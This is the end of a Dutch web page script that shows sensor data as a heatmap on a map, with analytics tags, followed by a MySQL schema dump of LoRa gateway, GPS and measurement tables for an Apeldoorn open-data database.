var popup = new ol.Overlay.Popup();
map.addOverlay(popup);
map.on('singleclick', dataPopups);
// callback routines for zoom and drag operations
map.getView().on('propertychange', function(e) {
switch (e.key) {
case 'zoom':
case 'center':
case 'resolution':
redisplay();
break;
}
});
window.addEventListener("resize", redisplay);
function selectSlam(id, reload = false) {
if (!reload && context) heatmap.refresh();
var xhttp = new XMLHttpRequest();
if (data==null) document.getElementById('download').innerHTML = 'data ophalen...';
xhttp.open('GET', 'slamdata_json.php?date='+id, true);
// xhttp.open('GET', 'slamdata_json.php?date='+id+'&calibrate', true);
xhttp.responseType = 'json';
xhttp.onload = function() {
if (xhttp.status == 200) {
data = xhttp.response;
document.getElementById('download').innerHTML = '<input type="button" onclick="window.open(\'http://www.meetjestad.net/data/slamdata.php?date=' + id + '\', \'_blank\');" value="ga naar data"/>';
if (!reload) focusMapOnData(map, data);
drawHeatmap(context, map, data, 'legend');
if (timer) clearInterval(timer);
timer = setInterval(function(){selectSlam(id, true);}, 10000);
}
};
xhttp.send();
}
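// Hypothetical usage (date format assumed by slamdata_json.php): selectSlam('2019-06-21')
// fetches that day's SLAM data, zooms the map to it, draws the heatmap, and then keeps
// redrawing it every 10 seconds until another date is selected.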
</script>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-100353310-1', 'auto');
ga('send', 'pageview');
</script>
<script type="text/javascript">
window.smartlook||(function(d) {
var o=smartlook=function(){ o.api.push(arguments)},h=d.getElementsByTagName('head')[0];
var c=d.createElement('script');o.api=new Array();c.async=true;c.type='text/javascript';
c.charset='utf-8';c.src='https://rec.smartlook.com/recorder.js';h.appendChild(c);
})(document);
smartlook('init', 'ec0a1db895268f5147945b6ff6c3e176bd0006a6');
</script>
<?php
include('data/jsendinclude.php');
?>
</body>
</html>
<file_sep>-- MySQL dump 10.13 Distrib 8.0.13, for Win64 (x86_64)
--
-- Host: apeldoornindata.nl Database: apeldoornindata
-- ------------------------------------------------------
-- Server version 5.5.5-10.1.41-MariaDB-0+deb9u1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
SET NAMES utf8 ;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Table structure for table `gateway`
--
DROP TABLE IF EXISTS `gateway`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gateway` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Gateway` text NOT NULL,
`Name` text NOT NULL,
`Ch0` bigint(20) NOT NULL,
`Ch1` bigint(20) NOT NULL,
`Ch2` bigint(20) NOT NULL,
`Ch3` bigint(20) NOT NULL,
`Ch4` bigint(20) NOT NULL,
`Ch5` bigint(20) NOT NULL,
`Ch6` bigint(20) NOT NULL,
`Ch7` bigint(20) NOT NULL,
`Sf7` bigint(20) NOT NULL,
`Sf8` bigint(20) NOT NULL,
`Sf9` bigint(20) NOT NULL,
`Sf10` bigint(20) NOT NULL,
`Sf11` bigint(20) NOT NULL,
`Sf12` bigint(20) NOT NULL,
`Lastmessage` datetime NOT NULL,
`Packets` bigint(20) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`),
UNIQUE KEY `Gateway_UNIQUE` (`Gateway`(50))
) ENGINE=MyISAM AUTO_INCREMENT=464 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `gpsgateway`
--
DROP TABLE IF EXISTS `gpsgateway`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gpsgateway` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Gpslocationid` bigint(20) NOT NULL,
`Gwid` text NOT NULL,
`Channel` int(11) NOT NULL,
`Rssi` int(11) NOT NULL,
`Snr` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=19461 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `gpslocation1`
--
DROP TABLE IF EXISTS `gpslocation1`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gpslocation1` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Moment` datetime NOT NULL,
`Lat` decimal(10,5) NOT NULL,
`Lon` decimal(10,5) NOT NULL,
`Alt` decimal(10,5) NOT NULL,
`Hdop` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`),
UNIQUE KEY `Moment_UNIQUE` (`Moment`),
UNIQUE KEY `Id_UNIQUE` (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=4048796 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `gpslocation16`
--
DROP TABLE IF EXISTS `gpslocation16`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gpslocation16` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Moment` datetime NOT NULL,
`Lat` decimal(10,5) NOT NULL,
`Lon` decimal(10,5) NOT NULL,
`Alt` decimal(10,5) NOT NULL,
`Hdop` decimal(10,5) NOT NULL,
`Speed` decimal(10,5) NOT NULL,
`Direction` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`),
UNIQUE KEY `Moment_UNIQUE` (`Moment`),
UNIQUE KEY `Id_UNIQUE` (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=3011 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `gpslocation2`
--
DROP TABLE IF EXISTS `gpslocation2`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gpslocation2` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Moment` datetime NOT NULL,
`Lat` decimal(10,5) NOT NULL,
`Lon` decimal(10,5) NOT NULL,
`Alt` decimal(10,5) NOT NULL,
`Hdop` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`),
UNIQUE KEY `Moment_UNIQUE` (`Moment`),
UNIQUE KEY `Id_UNIQUE` (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=55923 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `gpslocation67`
--
DROP TABLE IF EXISTS `gpslocation67`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gpslocation67` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Moment` datetime NOT NULL,
`Lat` decimal(10,5) NOT NULL,
`Lon` decimal(10,5) NOT NULL,
`Alt` decimal(10,5) NOT NULL,
`Hdop` decimal(10,5) NOT NULL,
`Speed` decimal(10,5) NOT NULL,
`Direction` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`),
UNIQUE KEY `Moment_UNIQUE` (`Moment`),
UNIQUE KEY `Id_UNIQUE` (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=45487 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `location`
--
DROP TABLE IF EXISTS `location`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `location` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Nodeid` bigint(20) NOT NULL,
`Moment` datetime NOT NULL,
`Lat` decimal(10,5) NOT NULL,
`Lon` decimal(10,5) NOT NULL,
`Alt` decimal(10,5) NOT NULL,
`Speed` decimal(10,5) NOT NULL,
`Heading` decimal(10,5) NOT NULL,
`locationcol` varchar(45) NOT NULL,
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode125`
--
DROP TABLE IF EXISTS `locationnode125`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode125` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=804 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode126`
--
DROP TABLE IF EXISTS `locationnode126`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode126` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=1652 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode127`
--
DROP TABLE IF EXISTS `locationnode127`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode127` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=105 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode128`
--
DROP TABLE IF EXISTS `locationnode128`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode128` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=93 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode129`
--
DROP TABLE IF EXISTS `locationnode129`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode129` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=81 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode130`
--
DROP TABLE IF EXISTS `locationnode130`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode130` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=424 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode131`
--
DROP TABLE IF EXISTS `locationnode131`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode131` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=94 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode132`
--
DROP TABLE IF EXISTS `locationnode132`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode132` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=146 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode133`
--
DROP TABLE IF EXISTS `locationnode133`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode133` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=83 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode134`
--
DROP TABLE IF EXISTS `locationnode134`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode134` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode135`
--
DROP TABLE IF EXISTS `locationnode135`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode135` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode136`
--
DROP TABLE IF EXISTS `locationnode136`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode136` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode137`
--
DROP TABLE IF EXISTS `locationnode137`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode137` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=116 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode138`
--
DROP TABLE IF EXISTS `locationnode138`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode138` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=67 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `loraraw`
--
DROP TABLE IF EXISTS `loraraw`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `loraraw` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Data` mediumtext NOT NULL,
`Moment` datetime NOT NULL,
`Processed` tinyint(4) NOT NULL DEFAULT '0',
`Nodeid` bigint(20) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`),
KEY `nodeid` (`Nodeid`),
KEY `processed` (`Processed`),
KEY `moment` (`Moment`)
) ENGINE=MyISAM AUTO_INCREMENT=4812655 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `lorarawttnmapper`
--
DROP TABLE IF EXISTS `lorarawttnmapper`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `lorarawttnmapper` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Data` mediumtext NOT NULL,
`Moment` datetime NOT NULL,
`Processed` tinyint(4) NOT NULL DEFAULT '0',
`Nodeid` bigint(20) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`),
KEY `nodeid` (`Nodeid`),
KEY `processed` (`Processed`),
KEY `moment` (`Moment`)
) ENGINE=MyISAM AUTO_INCREMENT=1879750 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `lorarawttnmappergateway`
--
DROP TABLE IF EXISTS `lorarawttnmappergateway`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `lorarawttnmappergateway` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Gwid` text,
`Lastmessage` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
`Alt` decimal(10,5) DEFAULT NULL,
`Ch0` bigint(20) DEFAULT '0',
`Ch1` bigint(20) DEFAULT '0',
`Ch2` bigint(20) DEFAULT '0',
`Ch3` bigint(20) DEFAULT '0',
`Ch4` bigint(20) DEFAULT '0',
`Ch5` bigint(20) DEFAULT '0',
`Ch6` bigint(20) DEFAULT '0',
`Ch7` bigint(20) DEFAULT '0',
PRIMARY KEY (`Id`),
UNIQUE KEY `Gwid` (`Gwid`(50))
) ENGINE=InnoDB AUTO_INCREMENT=3471386 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `lorarawttnmapperlocation`
--
DROP TABLE IF EXISTS `lorarawttnmapperlocation`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `lorarawttnmapperlocation` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
`Alt` decimal(10,5) DEFAULT NULL,
`Rssi` int(11) DEFAULT NULL,
`Rawid` bigint(20) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `lorarawttnmapperlocationgwrelation`
--
DROP TABLE IF EXISTS `lorarawttnmapperlocationgwrelation`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `lorarawttnmapperlocationgwrelation` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Gwid` bigint(20) DEFAULT NULL,
`Location` bigint(20) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement`
--
DROP TABLE IF EXISTS `measurement`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Point` bigint(20) NOT NULL,
`Moment` datetime NOT NULL,
`Measurevalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=205 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement1`
--
DROP TABLE IF EXISTS `measurement1`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement1` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement10`
--
DROP TABLE IF EXISTS `measurement10`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement10` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement100`
--
DROP TABLE IF EXISTS `measurement100`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement100` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement101`
--
DROP TABLE IF EXISTS `measurement101`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement101` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement102`
--
DROP TABLE IF EXISTS `measurement102`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement102` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement103`
--
DROP TABLE IF EXISTS `measurement103`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement103` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement104`
--
DROP TABLE IF EXISTS `measurement104`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement104` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement105`
--
DROP TABLE IF EXISTS `measurement105`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement105` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement106`
--
DROP TABLE IF EXISTS `measurement106`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement106` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement107`
--
DROP TABLE IF EXISTS `measurement107`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement107` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement108`
--
DROP TABLE IF EXISTS `measurement108`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement108` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement109`
--
DROP TABLE IF EXISTS `measurement109`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement109` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement11`
--
DROP TABLE IF EXISTS `measurement11`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement11` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement110`
--
DROP TABLE IF EXISTS `measurement110`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement110` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement111`
--
DROP TABLE IF EXISTS `measurement111`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement111` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement112`
--
DROP TABLE IF EXISTS `measurement112`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement112` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement113`
--
DROP TABLE IF EXISTS `measurement113`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement113` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement114`
--
DROP TABLE IF EXISTS `measurement114`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement114` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
